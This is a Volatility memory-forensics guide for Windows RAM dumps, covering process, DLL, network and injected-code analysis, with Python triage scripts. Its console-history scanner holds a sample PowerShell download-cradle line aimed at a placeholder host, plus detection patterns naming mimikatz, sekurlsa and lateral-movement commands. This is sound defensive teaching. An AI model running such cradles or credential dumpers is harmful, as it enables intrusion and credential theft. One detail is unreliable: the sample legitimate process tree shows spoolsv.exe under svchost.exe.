T1003, T1055

Volatility

How Volatility performs memory forensics on Windows, Linux, and macOS RAM dumps -- process analysis, malware extraction, hook detection, and timeline reconstruction.

What Volatility Is and Why Memory Forensics Matters

  • Volatility is an open-source memory forensics framework that analyzes RAM dumps (memory images) to reconstruct what was happening on a system at the moment the dump was captured.
  • Unlike disk forensics, which analyzes files that persist on storage, memory forensics captures the running state of the OS: processes, network connections, loaded drivers, registry keys in memory, injected code, and kernel data structures.
  • Malware that never writes to disk — reflective DLL injection, process hollowing, memory-only rootkits, and fileless PowerShell attacks — leaves no artifact on the hard drive but is fully visible in RAM.
  • Volatility is the tool that finds it. Pair with YARA rules for automated detection of known malware in memory dumps.

Essential Plugins — Process Analysis

pslist — List Running Processes

volatility -f memory.dmp windows.pslist

Shows every active process at the time of the dump. Differentiates between processes running in the current context and those in other sessions.

What to look for:

  • Processes with unusual names (misspellings or look-alikes: scvhost.exe instead of svchost.exe, a name one character off from explorer.exe, winlogon.exe with extra characters)
  • Processes running from unexpected parent directories (e.g., svchost.exe from C:\Users\Public\ instead of C:\Windows\System32\)
  • Multiple instances of processes that normally run once (e.g., two instances of lsass.exe or winlogon.exe)

psscan — Find Hidden Processes

volatility -f memory.dmp windows.psscan

Scans physical memory for process structures, catching processes hidden by kernel rootkits. pslist lists processes from the linked list maintained by the OS; psscan scans raw memory for EPROCESS structures regardless of whether they appear in the linked list.

What to look for: Processes that appear in psscan output but not in pslist output. These are processes that have been hidden — a strong rootkit indicator.

pstree — Process Tree

volatility -f memory.dmp windows.pstree

Shows parent-child relationships. A legitimate process tree looks like:

svchost.exe (PID: 1000)
    └── spoolsv.exe (PID: 1200)   [printing — expected]
explorer.exe (PID: 2000)
    └── notepad.exe (PID: 2200)   [user opened notepad — expected]

What to look for:

  • winword.exe spawning powershell.exe — macro execution
  • outlook.exe spawning cmd.exe — email-initiated compromise
  • svchost.exe spawning rundll32.exe — service launching code execution
  • explorer.exe spawning regsvr32.exe — user clicked a file that registered a COM component
  • Any process spawning net.exe, nslookup.exe, whoami.exe — post-exploitation reconnaissance commands
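The pslist and pstree checks above can be scripted once the process records are extracted. The following is an added example, not Volatility's own code: it takes PID/PPID/name/path records of the kind pslist and pstree report and applies the four checks (look-alike names, system binaries outside the Windows directory, duplicated singleton processes, and the suspicious parent-child pairs listed above). The baseline name sets, the Windows root path and the sample process list are constructed assumptions for this example. Look-alike detection uses plain Levenshtein distance with a threshold of two edits, because a swapped pair of letters such as scvhost/svchost counts as two substitutions there.

```python
# Added example (not Volatility's code): triage pslist/pstree-style records for the
# anomalies listed above. Records, directories and name lists are constructed
# assumptions for this example, not values from a real dump.
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    path: str


# Assumed baseline: core system binaries, where they live, and which run exactly once.
SYSTEM_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe",
                "winlogon.exe", "svchost.exe", "explorer.exe"}
SYSTEM_ROOT = "c:\\windows"
SINGLETONS = {"wininit.exe", "services.exe", "lsass.exe", "winlogon.exe"}

# Parent -> child pairs the page calls out, plus the post-exploitation children.
SUSPICIOUS_PAIRS = {
    ("winword.exe", "powershell.exe"): "macro execution",
    ("outlook.exe", "cmd.exe"): "email-initiated compromise",
    ("svchost.exe", "rundll32.exe"): "service launching code execution",
    ("explorer.exe", "regsvr32.exe"): "user clicked a file that registered a COM component",
}
RECON_CHILDREN = {"net.exe", "nslookup.exe", "whoami.exe"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a transposition such as scvhost/svchost counts as 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(procs):
    """Return (pid, reason) findings for the checks described in the text."""
    findings = []
    by_pid = {p.pid: p for p in procs}
    counts = Counter(p.name.lower() for p in procs)
    for p in procs:
        name = p.name.lower()
        # 1. look-alike names: within two edits of a system binary, but not one itself
        if name not in SYSTEM_NAMES:
            for known in sorted(SYSTEM_NAMES):
                if edit_distance(name, known) <= 2:
                    findings.append((p.pid, f"look-alike name {p.name} (resembles {known})"))
        # 2. system binaries running from outside the Windows directory
        if name in SYSTEM_NAMES and not p.path.lower().startswith(SYSTEM_ROOT):
            findings.append((p.pid, f"{p.name} running from {p.path}"))
        # 3. processes that should run once but appear more than once
        if name in SINGLETONS and counts[name] > 1:
            findings.append((p.pid, f"multiple instances of {p.name}"))
        # 4. suspicious parent/child relationships from the tree
        parent = by_pid.get(p.ppid)
        if parent is not None:
            reason = SUSPICIOUS_PAIRS.get((parent.name.lower(), name))
            if reason:
                findings.append((p.pid, f"{parent.name} spawned {p.name}: {reason}"))
            if name in RECON_CHILDREN:
                findings.append((p.pid, f"{parent.name} spawned {p.name}: post-exploitation command"))
    return findings


# Constructed process list mimicking pslist/pstree columns.
SAMPLE = [
    Proc(600, 4, "services.exe", r"C:\Windows\System32\services.exe"),
    Proc(700, 600, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(720, 600, "lsass.exe", r"C:\Windows\System32\lsass.exe"),
    Proc(900, 600, "scvhost.exe", r"C:\Users\Public\scvhost.exe"),
    Proc(2000, 1500, "explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(2100, 2000, "winword.exe", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    Proc(2200, 2100, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Proc(2300, 2200, "whoami.exe", r"C:\Windows\System32\whoami.exe"),
    Proc(3000, 600, "lsass.exe", r"C:\Users\Public\lsass.exe"),
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE):
        print(f"PID {pid}: {reason}")
```

Run against the constructed list, the script flags the look-alike scvhost.exe, both lsass.exe instances (one of them also for its path under C:\Users\Public), the winword.exe to powershell.exe chain, and whoami.exe spawned from that PowerShell. Real baselines differ per build and environment; the name sets are the part to tune.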

dlllist — List Loaded DLLs

volatility -f memory.dmp windows.dlllist --pid <PID>

Shows all DLLs loaded by a specific process.

What to look for:

  • DLLs loaded from %TEMP%, %APPDATA%, or user profile directories (legitimate DLLs live in C:\Windows\System32\ or C:\Program Files\)
  • DLLs that are not in the expected load order for the process
  • Missing DLL entries — a process that should load ws2_32.dll (network) but does not may be hiding its network activity
  • DLLs with mismatched company names — kernel32.dll should always be Microsoft-signed

Malware Extraction

cmdscan and consoles — Reconstruct Command History

volatility -f memory.dmp windows.cmdscan  (classic cmd.exe command history)
volatility -f memory.dmp windows.consoles (PowerShell console history)

What to look for:

  • Base64-encoded PowerShell commands
  • Download cradle URLs: IEX (New-Object Net.WebClient).DownloadString('http://...')
  • Reconnaissance commands: whoami, net user, net group "Domain Admins", ipconfig, route print
  • Lateral movement commands: psexec, wmic /node:, winrm, Enter-PSSession
  • Credential access: mimikatz, sekurlsa, lsadump, invoke-mimikatz
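The indicator list above maps directly onto a scan over recovered console lines. The following is an added example, not code from Volatility or this page: it classifies each recovered history line against the reconnaissance, lateral-movement, credential-access and download-cradle indicators named above, and decodes the base64 payload of a `-EncodedCommand` argument (PowerShell encodes it as UTF-16LE) so that the decoded text is scanned too. The history lines are constructed, and the encoded command is generated in the script from a harmless `Get-Process` rather than taken from any real incident.

```python
# Added example (not from Volatility or the page): classify recovered console history
# lines against the indicators listed above and decode -EncodedCommand payloads.
# The history lines are constructed; the encoded command is built here from a
# harmless string rather than taken from any real incident.
import base64
import re

ENCODED = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
HISTORY = [
    "whoami",
    'net group "Domain Admins" /domain',
    f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')",
    "ipconfig /all",
    r"dir C:\Users",
]

# Indicator patterns grouped by the categories the text uses.
INDICATORS = {
    "reconnaissance": [r"\bwhoami\b", r"\bnet\s+(user|group)\b", r"\bipconfig\b", r"\broute\s+print\b"],
    "lateral movement": [r"\bpsexec\b", r"\bwmic\s+/node:", r"\bwinrm\b", r"\bEnter-PSSession\b"],
    "credential access": [r"mimikatz", r"\bsekurlsa\b", r"\blsadump\b"],
    "download cradle": [r"\bIEX\b.*DownloadString\(", r"Invoke-Expression.*DownloadString\("],
}
# powershell.exe accepts -EncodedCommand and its unambiguous prefixes; the payload is base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(line: str):
    """Return the decoded -EncodedCommand text, or None if the line carries none."""
    m = ENC_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(line: str):
    """Labels for one history line; the decoded payload is scanned together with the line."""
    labels = []
    decoded = decode_encoded_command(line)
    text = line if decoded is None else f"{line} {decoded}"
    if decoded is not None:
        labels.append("encoded powershell")
    for category, patterns in INDICATORS.items():
        if any(re.search(p, text, re.IGNORECASE) for p in patterns):
            labels.append(category)
    return labels


def scan_history(lines):
    """Only lines with at least one label are returned."""
    out = []
    for line in lines:
        labels = classify(line)
        if labels:
            out.append((line, labels))
    return out


if __name__ == "__main__":
    for line, labels in scan_history(HISTORY):
        print(f"{', '.join(labels):<28} {line}")
```

Decoding before matching is the point: an encoded `net group` or `sekurlsa` invocation matches nothing in its base64 form, so a scanner that only looks at the raw line misses exactly the commands an intruder bothered to hide.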

netscan — Network Connections

volatility -f memory.dmp windows.netscan

Shows all network connections (TCP and UDP) at the time of the dump, mapped to the owning process. Cross-reference with Wireshark PCAP analysis for full network context.

What to look for:

  • Outbound connections to known-bad IPs or suspicious ports
  • Processes making connections that should not have network access (e.g., notepad.exe connecting to an external IP)
  • Listening services on non-standard ports (4443, 8080, 1337)
  • DNS queries to unusual domains
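The netscan review criteria above can be expressed as a small rule set over connection records. The following is an added example, not Volatility's netscan code: it takes records with the fields netscan reports (protocol, local and remote endpoint, state, owning PID and process) and flags non-standard listening ports, connections to a supplied known-bad list, and external connections, with a harsher label when the owner is a process that has no reason to touch the network. The internal address ranges, the no-network process list, the standard-port set and the connection records are all constructed assumptions.

```python
# Added example (not Volatility's netscan): review connection records of the kind
# netscan reports. The records, the internal address ranges, the "no network
# expected" list and the standard-port set are constructed assumptions.
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}
STANDARD_LISTEN_PORTS = {80, 135, 139, 443, 445, 3389, 5985}

# (proto, local addr, local port, remote addr, remote port, state, pid, owner)
CONNECTIONS = [
    ("TCPv4", "10.0.0.5", 49213, "203.0.113.17", 4443, "ESTABLISHED", 2200, "notepad.exe"),
    ("TCPv4", "10.0.0.5", 49220, "10.0.0.10", 445, "ESTABLISHED", 4, "System"),
    ("TCPv4", "0.0.0.0", 1337, "0.0.0.0", 0, "LISTENING", 3100, "svchost.exe"),
    ("TCPv4", "0.0.0.0", 445, "0.0.0.0", 0, "LISTENING", 4, "System"),
    ("UDPv4", "0.0.0.0", 53, "*", 0, "", 1400, "svchost.exe"),
]


def is_external(addr: str) -> bool:
    """True for an address outside the assumed internal ranges ('*' and 0.0.0.0 are not)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if ip.is_unspecified:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def review_connections(conns, known_bad=frozenset()):
    """Return (pid, reason) findings; known_bad is an optional set of remote addresses."""
    findings = []
    for proto, laddr, lport, raddr, rport, state, pid, owner in conns:
        if state == "LISTENING" and lport not in STANDARD_LISTEN_PORTS:
            findings.append((pid, f"{owner} listening on non-standard port {lport}/{proto}"))
        if raddr in known_bad:
            findings.append((pid, f"{owner} talking to known-bad address {raddr}"))
        if is_external(raddr):
            if owner.lower() in NO_NETWORK_EXPECTED:
                findings.append((pid, f"{owner} has no business on the network but reached {raddr}:{rport}"))
            else:
                findings.append((pid, f"{owner} outbound to external {raddr}:{rport}"))
    return findings


if __name__ == "__main__":
    for pid, reason in review_connections(CONNECTIONS):
        print(f"PID {pid}: {reason}")
```

Internal ranges are kept as an explicit list rather than relying on a library's notion of "private", because an analyst usually needs to add the organisation's own public ranges and VPN pools to it; every external finding still needs the PCAP or proxy logs mentioned above for context.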

malfind — Find Injected Code

volatility -f memory.dmp windows.malfind

Scans for memory regions with executable permissions that contain code injected into a process. This is the primary detection mechanism for reflective DLL injection, process hollowing, and shellcode injection.

What to look for:

  • Memory pages with PAGE_EXECUTE_READWRITE permissions (RWX) — extremely suspicious unless it is a JIT compiler
  • The MZ marker at the start of a memory region — a PE file (DLL or EXE) has been injected into the process
  • Shellcode patterns (NOP sleds, jump instructions, encoded payloads)
  • Memory regions flagged in malfind that do not correspond to any normally loaded module
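The four malfind indicators above can be checked against the raw bytes of a region once they are dumped. The following is an added example, not Volatility's malfind implementation: given a region's protection constant, start address and bytes, plus the address ranges of the modules a dlllist or ldrmodules run reported, it reports RWX permissions (unless the caller marks the process as a JIT host), an MZ/PE header outside any loaded module, a run of NOP bytes, and a region that no module backs. The module ranges, the addresses and the regions themselves are constructed; the PE header check is the standard MZ at offset 0 plus e_lfanew at 0x3C pointing at the `PE\0\0` signature.

```python
# Added example (not Volatility's malfind): apply the checks listed above to a
# memory region described by its protection, start address and bytes. The regions,
# module ranges and addresses are constructed for this example.
import struct

PAGE_EXECUTE_READ = 0x20        # Win32 memory protection constants
PAGE_EXECUTE_READWRITE = 0x40


def looks_like_pe(data: bytes) -> bool:
    """MZ at offset 0 and e_lfanew (offset 0x3C) pointing at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def longest_nop_run(data: bytes, nop: int = 0x90) -> int:
    """Length of the longest run of NOP bytes, a crude sled indicator."""
    best = run = 0
    for b in data:
        run = run + 1 if b == nop else 0
        best = max(best, run)
    return best


def assess_region(protection, data, start, mapped_modules, is_jit=False):
    """Reasons a region deserves a closer look; an empty list means nothing stood out."""
    reasons = []
    backed = any(lo <= start < hi for lo, hi in mapped_modules)
    if protection == PAGE_EXECUTE_READWRITE and not is_jit:
        reasons.append("RWX region")
    if looks_like_pe(data) and not backed:
        reasons.append("PE header outside any loaded module")
    if longest_nop_run(data) >= 16:
        reasons.append("NOP sled")
    if not backed:
        reasons.append("not backed by a loaded module")
    return reasons


def fake_pe() -> bytes:
    """Minimal constructed image header: MZ, e_lfanew = 0x80, PE signature at 0x80."""
    buf = bytearray(0x100)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed module range (as dlllist/ldrmodules would report) and regions to assess.
MODULES = [(0x7FF600000000, 0x7FF600100000)]
SAMPLES = {
    "main_image": (PAGE_EXECUTE_READ, fake_pe(), 0x7FF600000000),
    "injected_pe": (PAGE_EXECUTE_READWRITE, fake_pe(), 0x1A0000),
    "shellcode": (PAGE_EXECUTE_READWRITE, b"\x90" * 32 + b"\xCC" * 16, 0x2B0000),
}

if __name__ == "__main__":
    for label, (prot, data, start) in SAMPLES.items():
        print(f"{label:<12} {assess_region(prot, data, start, MODULES) or ['clean']}")
```

The main image passes because it is backed by a listed module and is not writable; the same header at an unbacked RWX address collects three reasons. The JIT exception matters in practice: .NET, Java and browser processes legitimately hold RWX pages, so the caller, not the check, decides when to suppress that reason.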

ldrmodules — Hidden DLL Detection

volatility -f memory.dmp windows.ldrmodules

Cross-references DLLs across three sources: the Process Environment Block (PEB), the VAD tree, and memory-mapped files. A DLL that is present in only one or two of these lists is likely hidden.

What to look for: DLLs that are missing from the PEB list but present in the VAD tree — the attacker removed the DLL from the PEB to hide it from enumeration tools, but the VAD (maintained by the kernel) still has the mapping.


Memory Forensics Investigation Workflow

Step 1 — Profile Identification

volatility -f memory.dmp windows.info

Identifies the OS version, kernel version, and architecture. This is required before any analysis.

Step 2 — Process Analysis

# Get a process tree
volatility -f memory.dmp windows.pstree

# Check for hidden processes: compare the PID set with the windows.pslist output above
# (psscan output carries no "not in pslist" column to grep for)
volatility -f memory.dmp windows.psscan

# Check loaded DLLs for suspicious processes
volatility -f memory.dmp windows.dlllist --pid <SUSPICIOUS_PID>
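The hidden-process check in Step 2, and the psscan description earlier on this page, both come down to a set comparison between the two plugins' outputs. The following is an added example, not part of Volatility: it parses the tab-separated tables that Volatility 3 prints for windows.pslist and windows.psscan (a banner line, progress lines, a header row starting with PID, then one row per process) and reports the PIDs that only psscan returned. One caveat the page does not spell out: psscan also recovers EPROCESS structures of processes that have already exited, so a psscan-only entry with an ExitTime is a terminated process, not a hidden one; the script separates the two. Both outputs below are constructed to match that layout and are not from a real dump.

```python
# Added example (not part of Volatility): diff pslist and psscan output to surface
# processes that only the scanner found. The parser assumes Volatility 3's
# tab-separated table with a header row; both outputs below are constructed.

PSLIST_OUT = """Volatility 3 Framework 2.5.0
Progress:  100.00\t\tPDB scanning finished
PID\tPPID\tImageFileName\tOffset(V)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tFile output
4\t0\tSystem\t0xfa8000c8a040\t85\t493\tN/A\tFalse\t2024-01-09 10:00:01.000000 \tN/A\tDisabled
600\t4\tservices.exe\t0xfa8001a2e060\t9\t210\t0\tFalse\t2024-01-09 10:00:05.000000 \tN/A\tDisabled
2200\t600\tsvchost.exe\t0xfa8001b3c940\t11\t320\t0\tFalse\t2024-01-09 10:00:07.000000 \tN/A\tDisabled
"""

PSSCAN_OUT = """Volatility 3 Framework 2.5.0
Progress:  100.00\t\tPDB scanning finished
PID\tPPID\tImageFileName\tOffset(P)\tThreads\tHandles\tSessionId\tWow64\tCreateTime\tExitTime\tFile output
4\t0\tSystem\t0x3e8a040\t85\t493\tN/A\tFalse\t2024-01-09 10:00:01.000000 \tN/A\tDisabled
600\t4\tservices.exe\t0x4c2e060\t9\t210\t0\tFalse\t2024-01-09 10:00:05.000000 \tN/A\tDisabled
2200\t600\tsvchost.exe\t0x5d3c940\t11\t320\t0\tFalse\t2024-01-09 10:00:07.000000 \tN/A\tDisabled
1337\t600\tdropper.exe\t0x6e4d3f0\t3\t50\t0\tFalse\t2024-01-09 10:12:44.000000 \tN/A\tDisabled
3100\t2200\tnotepad.exe\t0x7f5e2a0\t0\t0\t1\tFalse\t2024-01-09 10:03:10.000000 \t2024-01-09 10:05:00.000000 \tDisabled
"""


def parse_table(text: str):
    """Map PID -> row dict for one plugin's output, skipping the banner and progress lines."""
    header = None
    rows = {}
    for line in text.splitlines():
        cols = line.split("\t")
        if header is None:
            if cols[0] == "PID":
                header = cols
            continue
        if len(cols) != len(header):
            continue  # progress or blank lines, not data rows
        rec = dict(zip(header, cols))
        rows[int(rec["PID"])] = rec
    return rows


def compare_pslist_psscan(pslist_text: str, psscan_text: str):
    """Split psscan-only PIDs into hidden (still running, no ExitTime) and merely terminated."""
    listed = parse_table(pslist_text)
    scanned = parse_table(psscan_text)
    hidden, terminated = [], []
    for pid, rec in scanned.items():
        if pid in listed:
            continue
        if rec["ExitTime"].strip() == "N/A":
            hidden.append(pid)
        else:
            terminated.append(pid)
    return sorted(hidden), sorted(terminated)


if __name__ == "__main__":
    hidden, terminated = compare_pslist_psscan(PSLIST_OUT, PSSCAN_OUT)
    names = parse_table(PSSCAN_OUT)
    for pid in hidden:
        print(f"HIDDEN      PID {pid} {names[pid]['ImageFileName']} (unlinked from the active process list)")
    for pid in terminated:
        print(f"terminated  PID {pid} {names[pid]['ImageFileName']} (exited, not a rootkit indicator)")
```

With real output, save each plugin's table to a file and feed the two files' contents to compare_pslist_psscan; a hidden PID is the rootkit/DKOM indicator described above and is the one to follow up with dlllist, malfind and netscan.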

Step 3 — Network Evidence

# Extract network connections
volatility -f memory.dmp windows.netscan

Step 4 — Code Injection Detection

# Find injected code
volatility -f memory.dmp windows.malfind

# Find hidden or injected DLLs
volatility -f memory.dmp windows.ldrmodules --pid <SUSPICIOUS_PID>

Step 5 — Command History and Artifacts

# Reconstruct command history
volatility -f memory.dmp windows.cmdscan
volatility -f memory.dmp windows.consoles

# Extract command-line arguments for all processes
volatility -f memory.dmp windows.cmdline

# Check Windows event logs (if in memory)
volatility -f memory.dmp windows.evtxs

Step 6 — Timeline and Triage

# Build a timeline of system activity
volatility -f memory.dmp windows.timeliner

# Generate a summary of key findings
volatility -f memory.dmp windows.summary

Common Memory Forensics Findings

| Finding | Plugin | Implication |
| --- | --- | --- |
| Process hidden from pslist but visible in psscan | pslist vs psscan | Rootkit or DKOM (Direct Kernel Object Manipulation) |
| RWX memory region in non-JIT process | malfind | Process injection — likely shellcode or injected DLL |
| DLL missing from PEB but mapped in VAD | ldrmodules | DLL hiding — attacker removed the DLL from the PEB to evade detection |
| PowerShell command with base64 decode | consoles or cmdline | Post-exploitation — command-line logging already in place |
| Network connection to external IP from suspicious process | netscan | C2 beaconing or data exfiltration |
| Unlinked EPROCESS structure | psscan | Sophisticated rootkit — attacker has removed the EPROCESS from the kernel's linked list |
| MZ header in RWX memory | malfind | Complete PE (DLL or EXE) was injected into process memory |
